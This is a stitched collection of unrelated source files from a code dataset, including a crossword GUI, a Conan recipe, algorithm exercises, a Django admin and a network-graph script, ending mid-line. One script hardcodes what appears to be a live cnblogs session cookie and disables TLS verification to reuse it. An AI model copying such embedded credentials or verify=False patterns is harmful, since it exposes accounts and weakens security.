y, font=(\"Arial\", numSize), text = num)\n return\n\n# Writing letters in cells\nletterSize = 30\ndef markLetter(j, i, letter):\n x = cellSize * i + 35\n y = cellSize * j + 40\n W.create_text(x, y, font=(\"Arial\", letterSize), text = letter)\n return\n\n# Marking black cells\ndef markBlack(col, row):\n W.create_rectangle(col * cellSize, row * cellSize, col * cellSize + cellSize, row * cellSize + cellSize, fill='black')\n return\n\ntextWidth = 350\n# Printing Across clues\ndef createAcross():\n X.create_text(130,50, font=('Arial',40),text='Across')\n j = 0\n for i in acrossClues:\n X.create_text(30, 100 + j,font=('Arial',12), anchor='w', text= i + \": \" + acrossClues[i], width=textWidth)\n j+=40\n return\n\n# Printing Down clues\ndef createDown():\n X.create_text(450,50,font=('Arial',40),text='Down')\n j = 0\n for i in downClues:\n X.create_text(350, 100 + j,font=('Arial',12), anchor='w', text= i + \": \" + downClues[i], width=textWidth)\n j+=40\n return\n\nfile = open(\"file.txt\")\ncontent = file.read()\n\n# MAIN Method - Making the GUI ----------------------------------------------------------\n# Making the main crossword window\nwindow = tk.Tk()\nwindow.title(\"New York Times Mini Puzzle - Demo 1\") # Window title\n\n# Creating a canvas and making a crossword structure\nW = tk.Canvas(window,width=cellSize * 5,height=cellSize * 5,highlightbackground='black')\nW.place(x=100,y=170)\ncreateTable() # Print a 5x5 table\n\n# Name of the group as a tk label\ntk.Label(window, font=(\"Arial\", 20), text=\"APOLLO\", bg='black', fg = 'white').place(y = 100, x = 80)\n\n# Print the current date and time\ncurrentDT = datetime.datetime.now()\ntk.Label(window, font=(\"Arial\", 20), text = str(currentDT)[0:16], bg='black', fg = 'white',).place(y = 570, x = 180)\n\n# Puzzle Iteration ----------------------------------------------------------------------------------\n# While loop to iterate over each letter in the puzzle\ni = 0\nwhile i < 25:\n # Find the first cell using its cell id\n indexLetter = 'id=\"cell-id-' + str(i) + '\"'\n index = content.find(indexLetter)\n letter = content[index + (len(indexLetter) + 8):index + (len(indexLetter) + 18)]\n\n # Find the empty cell and mark it black\n if letter == 'Cell-block':\n row = int(i / 5)\n col = i % 5\n markBlack(col, row) # Mark cell black given cell coordinates\n i+=1\n continue\n # If not a black cell, continue with other options\n else:\n # Find the index for the letter in the cell\n index2 = content.find('text-anchor=\"middle\"', index)\n indexStart = content.find('text-anchor=\"start\"', index, index2)\n # If the cell has a number, then print the number on top left corner\n if indexStart != (-1):\n indexNumber = content.find(\"</text>\", indexStart)\n letterNumber = content[indexNumber + 7]\n markNum(int(i / 5), (i % 5), letterNumber)\n index3 = content.find('</text>',index2)\n # Main letter has the letter in the cell\n mainletter = content[index3-1]\n # Print the letter in the center of the cell\n markLetter(int(i / 5), (i % 5), mainletter)\n i+=1\n\n# Clues Section ----------------------------------------------------------------------------\n# Create a canvas for the clues\nX = tk.Canvas(window,height = 300,width=700,highlightbackground='black')\nX.pack(padx=50,side='right') # Position the clues section canvas at the right side of the screen\n\n# ACROSS SECTION --------------------------------------------------------------------------\n# Store the clues in a dictionary, label is clue number, element is clue itself\nacrossClues = dict()\nindex = content.find(\"Across\")\nindex2 = content.find(\"</span>\", index)\nj = 0\n# Find each clue and store append it to the 'acrossClues' dictionary\nwhile j < 5:\n clueNumber = content[index2-1]\n indexStart = content.find(\">\", index2 + 8)\n indexEnd = content.find(\"<\", indexStart)\n acrossClues[clueNumber] = content[indexStart+1:indexEnd]\n index2 = content.find(\"</span>\", indexEnd + 10)\n j+=1\ncreateAcross() # Print the across clues section\n\n# DOWN SECTION -----------------------------------------------------------------------------\n# Store the clues in a dictionary, label is clue number, element is clue itself\ndownClues = dict()\nindex = content.find(\"Down\", indexEnd)\nindex2 = content.find(\"</span>\", index)\nk = 0\n# Find each clue and store append it to the 'downClues' dictionary\nwhile k < 5:\n clueNumber = content[index2-1]\n indexStart = content.find(\">\", index2 + 8)\n indexEnd = content.find(\"<\", indexStart)\n downClues[clueNumber] = content[indexStart+1:indexEnd]\n index2 = content.find(\"</span>\", indexEnd + 10)\n k+=1\ncreateDown() # Print the down clues section\n\n# Size of the window\nwindow.geometry(\"1366x768\")\n# Main loop runs the GUI itself\nwindow.mainloop()\n","sub_path":"firstDemo/generateData.py","file_name":"generateData.py","file_ext":"py","file_size_in_byte":6091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"615927004","text":"# -*- coding: utf-8 -*-\n\nfrom conans import ConanFile, CMake, tools\nimport os\nimport re\nimport subprocess\nimport sys\nfrom packaging import version\nfrom pathlib import Path\n\nclass HDILibConan(ConanFile):\n name = \"HDILib\"\n default_version = \"1.0.0-alpha1\"\n description = \"HDILib is a library for the scalable analysis of large and high-dimensional data. \"\n topics = (\"embedding\", \"analysis\", \"n-dimensional\", \"tSNE\")\n url = \"https://github.com/biovault/HDILib\"\n author = \"B. van Lew <b.van_lew@lumc.nl>\" #conanfile author\n license = \"MIT\" # License for packaged library; please use SPDX Identifiers https://spdx.org/licenses/\n default_user = \"lkeb\"\n default_channel = \"stable\"\n\n generators = \"cmake\"\n\n # Options may need to change depending on the packaged library\n settings = \"os\", \"build_type\", \"compiler\", \"arch\"\n options = {\"shared\": [True, False], \"fPIC\": [True, False]}\n default_options = {\"shared\": True, \"fPIC\": True}\n\n scm = {\n \"type\": \"git\",\n \"url\": \"https://github.com/biovault/HDILib.git\",\n \"submodule\": \"recursive\"\n }\n exports = \"hdi*\", \"CMakeLists.txt\", \"LICENSE\", \n\n # Flann builds are bit complex and certain versions fail with \n # certain platform, and compiler combinations. Hence use \n # either self built 1.8.5 for Windows or system supplied \n # 1.8.4 on Linux and Macos\n\n # Set version based on branch according to the following:\n #\n # master - gets version \"latest\"\n # release/x.y.z - gets version \"x.y.z\"\n # feature/blahblah - gets version \"latest_feat_blahblah\n # otherwise use the self.version hardcoded is used\n def set_version(self):\n ci_branch = os.getenv(\"CONAN_HDILIB_CI_BRANCH\", \"master\")\n\n print(\"Building branch: \", ci_branch) \n rel_match = re.compile(\"release/(\\d+\\.\\d+.\\d+)(.*)\")\n feat_match = re.compile(\"feature/(.*)\")\n\n if ci_branch == \"master\":\n self.version = \"latest\"\n else:\n rel = rel_match.search(ci_branch)\n if rel is not None:\n self.version = rel.group(1) + rel.group(2)\n else:\n feat = feat_match.search(ci_branch)\n if feat is not None:\n self.version = feat.group(1)\n self.scm[\"revision\"] = ci_branch\n\n def _get_python_cmake(self):\n if None is not os.environ.get(\"APPVEYOR\", None):\n pypath = Path(sys.executable)\n cmakePath = Path(pypath.parents[0], \"Scripts/cmake.exe\")\n return cmakePath\n return \"cmake\"\n\n def system_requirements(self):\n if tools.os_info.is_macos:\n target = os.environ.get('MACOSX_DEPLOYMENT_TARGET', '10.13')\n if version.parse(target) > version.parse('10.12'):\n installer = tools.SystemPackageTool()\n installer.install('libomp')\n\n def requirements(self):\n if self.settings.os == \"Windows\":\n self.requires(\"flann/1.8.5@lkeb/stable\")\n else:\n # Macos and flann use 1.8.4\n self.requires(\"flann/1.8.4@lkeb/stable\")\n\n def config_options(self):\n if self.settings.os == 'Windows':\n del self.options.fPIC\n\n def _configure_cmake(self, build_type):\n # Inject the conan dependency paths into the CMakeLists.txt\n conanproj = (\"PROJECT(${PROJECT})\\n\"\n \"include(${CMAKE_BINARY_DIR}/conanbuildinfo.cmake)\\n\"\n \"conan_basic_setup()\\n\"\n )\n tools.replace_in_file(\"CMakeLists.txt\", \"PROJECT(${PROJECT})\", conanproj)\n if self.settings.os == \"Macos\":\n cmake = CMake(self, generator='Xcode', build_type=build_type)\n else:\n cmake = CMake(self, build_type=build_type)\n if self.settings.os == \"Windows\" and self.options.shared:\n cmake.definitions[\"CMAKE_WINDOWS_EXPORT_ALL_SYMBOLS\"] = True\n if self.settings.os == \"Linux\" or self.settings.os == \"Macos\":\n cmake.definitions[\"CMAKE_CXX_STANDARD\"] = 14\n cmake.definitions[\"CMAKE_CXX_STANDARD_REQUIRED\"] = \"ON\"\n cmake.definitions[\"HDI_EXTERNAL_FLANN_INCLUDE_DIR\"] = \"${CONAN_INCLUDE_DIRS_FLANN}\"\n cmake.definitions[\"HDI_USE_ROARING\"] = \"OFF\"\n cmake.definitions[\"HDILib_VERSION\"] = self.version\n print(f\"Set version to {self.version}\")\n cmake.configure()\n cmake.verbose = True\n return cmake\n\n def build(self):\n\n install_dir = Path(self.build_folder).joinpath(\"install\")\n install_dir.mkdir(exist_ok=True)\n config = str(self.settings.build_type)\n print(f\"Installing: install for {config} build\")\n cmakepath = self._get_python_cmake()\n\n cmake_debug = self._configure_cmake('Debug')\n cmake_debug.build()\n result = subprocess.run([f\"{str(cmakepath)}\",\n \"--install\", self.build_folder,\n \"--config\", \"Debug\",\n \"--verbose\",\n \"--prefix\", str(install_dir)], capture_output=True)\n\n cmake_release = self._configure_cmake('Release')\n cmake_release.build()\n result = subprocess.run([f\"{str(cmakepath)}\",\n \"--install\", self.build_folder,\n \"--config\", \"Release\",\n \"--verbose\",\n \"--prefix\", str(install_dir)], capture_output=True)\n\n\n print(f\"Install for {config} build - complete. \\n Output: {result.stdout} \\n Errors: {result.stderr}\")\n\n def package(self):\n install_dir = Path(self.build_folder).joinpath(\"install\")\n self.copy(pattern=\"*\", src=str(install_dir))\n\n def package_info(self):\n self.cpp_info.libs = tools.collect_libs(self)\n","sub_path":"conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":5737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"122321810","text":"class Solution:\n def numOfMinutes(self, n: int, headID: int, manager: List[int], informTime: List[int]) -> int:\n def make_adj_list(manager):\n adj_list = [[] for i in manager]\n \n for index,val in enumerate(manager):\n if val != -1:\n adj_list[val].append(index)\n \n return adj_list\n \n #want to traverse through adj_list and add the cost of the dfs travels from the root and return the max\n #max_time is the max cost of dfs traversal\n def dfs(vertex,seen,adj_list,inform_time,max_time) -> int:\n\n if not adj_list[vertex]:\n return 0\n seen.add(vertex)\n max_time = 0\n for emp in adj_list[vertex]:\n if emp not in seen:\n max_time = max(max_time, dfs(emp,seen,adj_list,inform_time,max_time))\n return max_time + inform_time[vertex]\n \n if n == 1:\n return 0\n adj_list = make_adj_list(manager)\n print(adj_list)\n seen = set()\n max_time = 0\n max_time = dfs(headID,seen,adj_list,informTime,max_time)\n return max_time\n \n \n #so we were close, it was just that our solution was adding too much to the answer\n #how do we think of the computes that we need to do and the the return statements that we want\n \n #we have two base cases, one where we return from empty employee, should be zero, cause no time. makes sense\n #we sift those return values up the tree, essentially for every node, once we start returning we want to know that we have the max inform time from its children\n #then we want to pass it up\n #we actually do not know the max return time at the bottom of the tree\n #return statements in dfs is essentially what info we know from this traversal so far\n\n #also we did not need a seen array because we knew this is a non clyclic graph\n\n #in general for return statements in a dfs solution, we will have a base case return and a return on the bottom of the call when were done and want to sift the values back up","sub_path":"Graphs/emp_inform_time.py","file_name":"emp_inform_time.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"184458620","text":"import socket \r\n\r\ndef find_service_name():\r\n protocolname = 'tcp'\r\n for port in [80,25,21,22,110]:\r\n print (\"Port: %s => service name: %s\" % (port, socket.getservbyport(port,protocolname))) \r\n print (\"Port: %s => service name: %s\" % (53, socket.getservbyport(53,'udp')))\r\n\r\nif __name__ == '__main__':\r\n find_service_name()\r\n\r\n# the output is the service binded by the port and the service behind each port \r\n# the output is port 80 is http 25 is smtp and 53 is domain (DNS)\r\n# the output port 21 -> ftp ; 22 -> ssh; 110 -> pop3\r\n","sub_path":"lab2/Sockets/service_name.py","file_name":"service_name.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"650160243","text":"import tempfile\nimport os\n\n# 一時ディレクトリ\nwith tempfile.TemporaryDirectory() as dir:\n temp_path = os.path.join(dir, 'temp.txt')\n # shelveを使うことで、ディクショナリ形式で扱うことができる\n with open(temp_path, 'w') as f:\n # 書き込み\n f.write('test')\n # ファイルの存在確認()\n print(os.path.exists(temp_path))\n\n# 一時ディレクトリのため、この時点では削除されているtrue(false)\nprint(os.path.exists(temp_path))\n","sub_path":"advanced_library/sample_tempfile.py","file_name":"sample_tempfile.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"357322320","text":"# -*- coding: utf-8 -*-\nimport sys\nimport os\n\n# add zip-files in codeaide.lib to sys.path\nimport codeaide.lib\n\n# i18n-support\nimport gettext\n\n\n\nshare_path = os.path.abspath(os.path.join(__file__, \"..\", \"..\"))\nlocale_path = os.path.join(share_path, \"locale\")\nicon_path = os.path.join(share_path, \"icons\")\nicon_theme = \"oxygen\" # gnome\ngettext.bindtextdomain(\"codeaide\", locale_path)\ngettext.textdomain(\"codeaide\")\ngettext.bind_textdomain_codeset(\"codeaide\", \"utf-8\")\n\n\nDEBUG = os.environ.get(\"CODEAIDE_DEBUG\", \"0\").lower() in (\"yes\", \"1\", \"true\")\n\n\nmode_settings = {\n \"line_numbers\": \"LineNumbers\", # sidebar\n \"line_status\": \"LineStatus\", # sidebar\n \"block_selection\": \"BlockSelection\", # editextras\n \"autotyping\": \"AutoTyping\", # autotyping\n \"whitespace\": \"Whitespace\", # visualhelper\n \"highlight_current_line\": \"HighlightLine\", # visualhelper\n \"wrap_indicator\": \"WrapIndicator\", # visualhelper\n \"paren_matcher\": \"ParentheseMatcher\", # parenmatcher\n \"occurrences\": \"Occurrences\" # occurrences\n}","sub_path":"used srcs/codeaide_editor/codeaide/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"416724521","text":"# -*- coding: utf-8 -*-\nimport requests\nimport urllib3\n\nurllib3.disable_warnings()\n\n'''\nse=requests.session()\nse.get(\"http://zzk.cnblogs.com/s\")\n\nr=se.get(\"http://zzk.cnblogs.com/s/blogpost?Keywords=https \")\nprint(r.text)\nprint(r.status_code)\nprint(r.url)\n'''\n\nurl = \"https://passport.cnblogs.com/user/signin\"\n\nheader = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0'\n }\n\n# r = requests.post(url, json=payload, headers=headers,verify=False)\n# 修改后如下\ns = requests.session()\ns.get(url)\nr = s.get(url, headers=header, verify=False)\nprint(s.cookies)\nprint(s.cookies.get_dict())\n\nc = requests.cookies.RequestsCookieJar() #创建cookie对象,并在里面增加cookie\n# c.set('CNBlogsCookie','B270816A100FB0931A371F0E6F33ED52E5583102E6035A8C7583EFF6CEC81EDA506A163962338236149ADEBD58291AB41CE8AF383E0DDE35F747E4835D23735DB8CD49DF3F34389FE9136637C3309A0AE74E7144')\n# c.set('Cnblogs.AspNetCore.Cookies', 'CfDJ8Gf3jjv4cttDnEy2UYRcGZ0Nd5CIWlAssetUhiccTVpfE-ZzCQDRyjghnv6Oe-M6ywHpOHdmsZ_V5YU172EyOlu6PYfSEb0coMGpggc9TZylV0roB4cwidqwK1dYugggq7O2BoEsrbgR1m966dntV9YkdyDlm1MTHRLSCsAforgf4BMaSe0N9WskZF-lhGvZ50jlyIc82PDQCezsimoV_Q0tzX23bBcrvEIzB96VL_uz4PjzLy0DwAHNYyGQglDIdcODEilHcQrl3zId5es6lGrAqyywXypcZzQyCcch7sOG')\n# c.set('AlwaysCreateItemsAsActive','True')\n# c.set('AdminCookieAlwaysExpandAdvanced','True')\n# c.set('_gid','GA1.2.962725249.1526279279')\n# c.set('_ga','GA1.2.360862112.1525779126')\nc.set('.CNBlogsCookie','2C1A386DF5B7DF22657CEE86256E1CA5D3CCB3397E03D2C4B4AC7022C1A77D981C8F7E8F7DF7EC6C9BC3C6550035873CCE9006FCD09F7BEAE9E2AC4463E3463479801000CCA68A17876DC4C556022A04790E06FC')\n#c.set('.Cnblogs.AspNetCore.Cookies','CfDJ8Gf3jjv4cttDnEy2UYRcGZ3V-rLd-acavpBrdNW7N0zpa_E9zJHWdHwly7NSAPUN7CQyQWrXblOzJCZVJsRbRhaLiHG1grT4frfzLCaeGzVQorJfB6W-fdZwwH888Li9xOVyqDme-qa52PWbEIdF-5dvdooww1SAwNhGMR5yPi7vBKxTsOl-PZc-2CNeulfmIXPGPL5_dTP_wPfiqE1UG6T8bC1_Bx2_5xHsS07Nt7PX68u2SF4oMd4GHvCQ0jaxbPbGDkRD9UIQTGJirCV7SuPwJGDI8wBmWsD6LfC7hTIY')\n \ns.cookies.update(c) #往session的cookie中,增加cookie\n \nprint(s.cookies)\nprint(s.cookies.get_dict())\n\nurl1= \"https://i.cnblogs.com/EditPosts.aspx?opt=1\"\n \nr1 = s.get(url1, headers=header, verify=False)\nprint(r1.text)\nprint(r1.status_code)\n\n\n\n\n\n\n\n\n","sub_path":"interface/src/test/test_session.py","file_name":"test_session.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"291698734","text":"import sys\n\nf_input = open(sys.argv[1])\n#problems = int(f_input.readline().rstrip())\n\ndef checkwin(board):\n def checkline(score):\n if score>3:\n return \"X won\"\n elif score<0:\n return None\n elif score<1:\n return \"O won\"\n else:\n return None\n \n for i in xrange(4):\n if not checkline(sum(board[i])) is None:\n return checkline(sum(board[i]))\n for i in xrange(4):\n if not checkline(sum([row[i] for row in board])) is None:\n return checkline(sum([row[i] for row in board]))\n if not checkline(sum([board[i][i] for i in xrange(4)])) is None:\n return checkline(sum([board[i][i] for i in xrange(4)]))\n if not checkline(sum([board[i][-(i+1)] for i in xrange(4)])) is None:\n return checkline(sum([board[i][-(i+1)] for i in xrange(4)]))\n\n ## draw or not complete ##\n if sum([sum(line) for line in board])>0:\n return \"Draw\"\n else:\n return \"Game has not completed\"\n \n \ndef transrate(character):\n if character == \"X\":\n return 1\n elif character == \"O\":\n return 0\n elif character == \"T\":\n return 0.5\n elif character == \".\":\n return -20\n \n\nlinenums = int(f_input.readline().rstrip())\nfor i in xrange(linenums):\n board = []\n for j in xrange(4):\n board.append([transrate(c) for c in f_input.readline().rstrip()])\n f_input.readline()\n sys.stdout.write(\"Case #\"+str(i+1)+\": \"+checkwin(board)+\"\\n\")\n\n\n","sub_path":"solutions_python/Problem_116/814.py","file_name":"814.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"271850843","text":"#Gorokhova Olena KNIT 16-A\n#по s-названию страны вывести название континента\nk = True\nwhile k:\n from enum import Enum\n class country(Enum):\n Germany = 1\n Cuba = 2\n Laos = 3\n Monaco = 4\n Bangladesho = 5\n Ukraine = 6\n class continent(Enum):\n Asia = 1\n America = 2\n Europe = 3\n try:\n Asia = country.Bangladesho, country.Laos\n America = country.Cuba\n Europe = country.Germany, country.Monaco\n s = country[input('country: ')]\n except (ValueError, KeyError):\n print('wrote value or key')\n for i in Asia:\n if i == s:\n print(continent.Asia.name)\n for i in Europe:\n if i == s:\n print(continent.Europe.name)\n if America == s:\n print(continent.America.name)\n while True:\n L = input(\"хотите продолжить? 1 - да, 2 - нет :\")\n if L == \"1\":\n break\n elif L == \"2\":\n flag = False\n print(\"пока\\n\")\n","sub_path":"laba 1/laba 1 _13.py","file_name":"laba 1 _13.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"295088227","text":"from django.contrib import admin\n\nfrom .models import (\n Activity,\n ActivityMedia,\n Organization,\n OrganizationMember,\n SchoolActivityGroup,\n SchoolActivityOrder,\n)\n\n\ndef approve_order(self, request, queryset):\n for order in queryset:\n order.status = SchoolActivityOrder.Status.APPROVED\n order.save()\n\n\napprove_order.short_description = \"Approve Order\"\n\n\n@admin.register(SchoolActivityOrder)\nclass SchoolActivityOrderAdmin(admin.ModelAdmin):\n list_display = [\"school\", \"activity\", \"created_at\", \"updated_at\", \"status\"]\n actions = [approve_order]\n\n\nadmin.site.register(Organization)\nadmin.site.register(Activity)\nadmin.site.register(ActivityMedia)\nadmin.site.register(OrganizationMember)\nadmin.site.register(SchoolActivityGroup)\n","sub_path":"server/server/organizations/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"259730574","text":"# O(n + k*log(n))\nimport collections, heapq\ndef top_k_frequent_words(words, k):\n count = collections.Counter(words)\n heap = [(-freq, word) for word, freq in count.items()]\n heapq.heapify(heap)\n return [heapq.heappop(heap)[1] for i in range(k)]\n\n\nprint(top_k_frequent_words([\"love\", \"leetcode\", \"i\", \"i\", \"love\", \"coding\"], 2))\n","sub_path":"692_top_k_frequent_words.py","file_name":"692_top_k_frequent_words.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"448171284","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/sutekh/base/gui/LocalProfileEditor.py\n# Compiled at: 2019-12-11 16:37:48\n\"\"\"This handles editing the local profile editor, (for temporary options)\"\"\"\nimport gtk\nfrom .SutekhDialog import SutekhDialog\nfrom .AutoScrolledWindow import AutoScrolledWindow\nfrom .PreferenceTable import PreferenceTable\nfrom .BaseConfigFile import FRAME\n\nclass LocalProfileEditor(SutekhDialog):\n \"\"\"Dialog which allows the user to set temporary option profiles.\n \"\"\"\n RESPONSE_CLOSE = 1\n RESPONSE_CANCEL = 2\n\n def __init__(self, oParent, oConfig, sFrame, sCardSet):\n super(LocalProfileEditor, self).__init__('Edit Local Profile', oParent, gtk.DIALOG_MODAL | gtk.DIALOG_DESTROY_WITH_PARENT)\n self.__oParent = oParent\n self.__oConfig = oConfig\n self.__sFrame = sFrame\n self.__sCardSet = sCardSet\n self.__dUnsavedChanges = None\n aOptions = []\n for sKey in self.__oConfig.profile_options(FRAME):\n if sKey == 'name':\n continue\n aOptions.append((sKey, self.__oConfig.get_option_spec(FRAME, sKey),\n True))\n\n self.__oOptionsTable = PreferenceTable(aOptions, oConfig.get_validator())\n self.vbox.pack_start(AutoScrolledWindow(self.__oOptionsTable, bUseViewport=True))\n self.set_default_size(600, 550)\n self.connect('response', self._button_response)\n self.add_button('Cancel', self.RESPONSE_CANCEL)\n self.add_button('Close', self.RESPONSE_CLOSE)\n self.show_all()\n self._repopulate_options()\n return\n\n def _button_response(self, _oWidget, iResponse):\n \"\"\"Handle dialog response\"\"\"\n if iResponse != self.RESPONSE_CLOSE:\n self.destroy()\n return\n self._store_active_profile()\n if self._check_unsaved_changes():\n self._save_unsaved_changes()\n self.destroy()\n else:\n self.destroy()\n oDlg = LocalProfileEditor(self.__oParent, self.__oConfig, self.__sFrame, self.__sCardSet)\n oDlg.run()\n\n def _repopulate_options(self):\n \"\"\"Refresh the contents of the options box.\"\"\"\n dNewValues = {}\n dInherited = {}\n sFrame, sCardSet = self.__sFrame, self.__sCardSet\n for sKey in self.__oConfig.profile_options(FRAME):\n dNewValues[sKey] = self.__oConfig.get_local_frame_option(sFrame, sKey)\n dInherited[sKey] = self.__oConfig.get_deck_option(sFrame, sCardSet, sKey, bUseLocal=False)\n\n self.__oOptionsTable.update_values(dNewValues, {}, {}, dInherited)\n\n def _check_unsaved_changes(self):\n \"\"\"Check that none of the changes make are bad.\n\n Return True if the changes are safe for saving, False otherwise.\n \"\"\"\n return True\n\n def _save_unsaved_changes(self):\n \"\"\"Save all the unsaved changes.\"\"\"\n sFrame = self.__sFrame\n for sKey, sValue in self.__dUnsavedChanges.items():\n self.__oConfig.set_local_frame_option(sFrame, sKey, sValue)\n\n def _store_active_profile(self):\n \"\"\"Store the unsaved local profile changes.\"\"\"\n self.__dUnsavedChanges = self.__oOptionsTable.get_values()","sub_path":"pycfiles/Sutekh-1.0.0-py2.7/LocalProfileEditor.py","file_name":"LocalProfileEditor.py","file_ext":"py","file_size_in_byte":3357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"261981610","text":"import networkx as nx\nimport matplotlib.pyplot as plt\nimport window_s_p_ft as win\nimport numpy as np\nimport math\nfrom sklearn.manifold import MDS\n\ncl = 'L'\n\ndata = win.getData(class_=cl)\ndata = sorted(data, key=lambda s: np.mean(s), reverse=True)\nstuds = win.getStudents(class_=cl)\nstuds = sorted(studs, key=lambda s: np.mean(s.grades), reverse=True)\nst_corr = np.corrcoef(data, rowvar=1)\n\nmds = MDS(n_components=2, dissimilarity='precomputed')\ndists = np.empty((len(st_corr), len(st_corr)))\nfor ii in range(len(data)):\n for jj in range(len(data)):\n dists[ii][jj] = math.sqrt(2 * (1 - st_corr[ii][jj]))\npos = mds.fit(dists).embedding_\n\nG = nx.Graph()\nG.add_nodes_from(range(len(data)))\nlabels = []\nfor ii in range(len(data)):\n labels.append(str(ii + 1) + \" \" +\n str(studs[ii].spec))\n for jj in range(ii + 1, len(data)):\n d = math.sqrt(2 * (1 - st_corr[ii][jj]))\n G.add_edge(ii, jj, weight=d)\n\nsi = []\nfor n, nbrs in G.adjacency_iter():\n w = 0\n for nbr, eattr in nbrs.items():\n w += 1 / eattr['weight']\n si.append(w)\n\n# pos = nx.spring_layout(G, k=1) # positions for all nodes\npos = {ii: p for ii, p in enumerate(pos)}\n\nfig, ax = plt.subplots(1)\n\n# nodes\nscaler = 10\nnx.draw_networkx_nodes(G, pos, node_size=[x * scaler for x in si])\n\n# edges\nmst = nx.minimum_spanning_edges(G, data=False)\nnx.draw_networkx_edges(G, pos, width=1, edgelist=list(mst))\n\n# labels; make them but dont actually draw them\nlabels = {ii: label for ii, label in enumerate(labels)}\nnx.draw_networkx_labels(G, pos, labels=labels,\n font_size=10, font_family='sans-serif')\n# labs = dict(((u, v), round(d['weight'], 2)) for u, v, d in G.edges(data=True))\n# for k in labs:\n# print(k, labs[k])\n# nx.draw_networkx_edge_labels(G, pos, edge_labels=labs, font_size=10,\n# font_family='sans-serif')\n\nplt.axis('off')\n# plt.savefig(\"weighted_graph.png\") # save as png\n\n# legend\n# props = dict(boxstyle='round', facecolor='wheat', alpha=0.5)\n# ax.text(-0.15, 0.95, textstr, transform=ax.transAxes,\n# fontsize=12, verticalalignment='top', bbox=props)\n# plt.axis('off')\n\n# write to file in gexf format, gephi is much better for plotting networks\nmst = nx.minimum_spanning_tree(G)\nws = nx.get_edge_attributes(mst, 'weight')\nfor key, value in ws.items():\n ws[key] = 1 - value * value / 2\nnx.set_edge_attributes(mst, 'weight', ws)\nnx.set_node_attributes(mst, \"label\", labels)\nnx.relabel_gexf_graph(mst)\nnx.write_gexf(mst, \"mst_courses.gexf\")\n\nplt.show() # display\n","sub_path":"mst_mds.py","file_name":"mst_mds.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"274932645","text":"from openpyxl.chart import Reference, ScatterChart, LineChart, BarChart, Series\nfrom quasicycle import Quasicycle\nimport numpy as np\nfrom sklearn.cluster import MeanShift, KMeans\nimport matplotlib.pyplot as plt\n\n\ndef import_source_data(workbook, source_sheet, config):\n col = 1\n while True:\n if source_sheet.cell(row=1, column=col).value == config.source_col:\n break\n col += 1\n if config.output_sheet in workbook.sheetnames:\n workbook.remove_sheet(workbook.get_sheet_by_name(config.output_sheet))\n workbook.create_sheet(config.output_sheet)\n output_sheet = workbook[config.output_sheet]\n i = config.start_row\n while source_sheet.cell(row=i + 1, column=col).value is not None:\n output_sheet.cell(i, 1).value = float(source_sheet.cell(i + 1, col).value)\n i += 1\n\n\ndef create_diagram(quasicycle, height=7, width=10, style=11):\n chart = ScatterChart()\n chart.title = quasicycle.name\n chart.height = height\n chart.width = width\n chart.x_axis.title = ''\n chart.y_axis.title = ''\n chart.legend = None\n rows_reference = Reference(quasicycle.sheet, min_col=quasicycle.start_cell_col,\n min_row=quasicycle.start_cell_row, max_row=quasicycle.start_cell_row + quasicycle.size)\n cols_reference = Reference(quasicycle.sheet, min_col=quasicycle.start_cell_col + 1,\n min_row=quasicycle.start_cell_row, max_row=quasicycle.start_cell_row + quasicycle.size)\n series = Series(cols_reference, rows_reference, title_from_data=False)\n chart.layoutTarget = \"inner\"\n chart.style = style\n chart.series.append(series)\n return chart\n\n\ndef create_bar_chart(sheet, start_row, size):\n bar_chart = BarChart()\n bar_chart.type = \"col\"\n bar_chart.style = 10\n bar_chart.title = \"Память квазициклов\"\n bar_chart.y_axis.title = 'Память'\n bar_chart.x_axis.title = 'Квазициклы'\n data = Reference(sheet, min_col=2, min_row=start_row - 1, max_row=start_row + size)\n indexes = Reference(sheet, min_col=1, min_row=start_row, max_row=start_row + size)\n bar_chart.add_data(data, titles_from_data=True)\n bar_chart.set_categories(indexes)\n bar_chart.shape = 4\n bar_chart.legend = None\n return bar_chart\n\n\ndef calculate_derivative(sheet, config):\n sheet.cell(1, 1).value = \"Временной ряд\"\n sheet.cell(1, 2).value = \"Приращение\"\n sheet.cell(1, 3).value = \"Сдвиг\"\n current_row = config.start_row\n while sheet.cell(current_row + 1, config.start_col).value is not None:\n sheet.cell(current_row, config.start_col + 1).value = sheet.cell(current_row + 1, config.start_col).value \\\n - sheet.cell(current_row, config.start_col).value\n current_row += 1\n current_row = config.start_row\n while sheet.cell(current_row + 1, 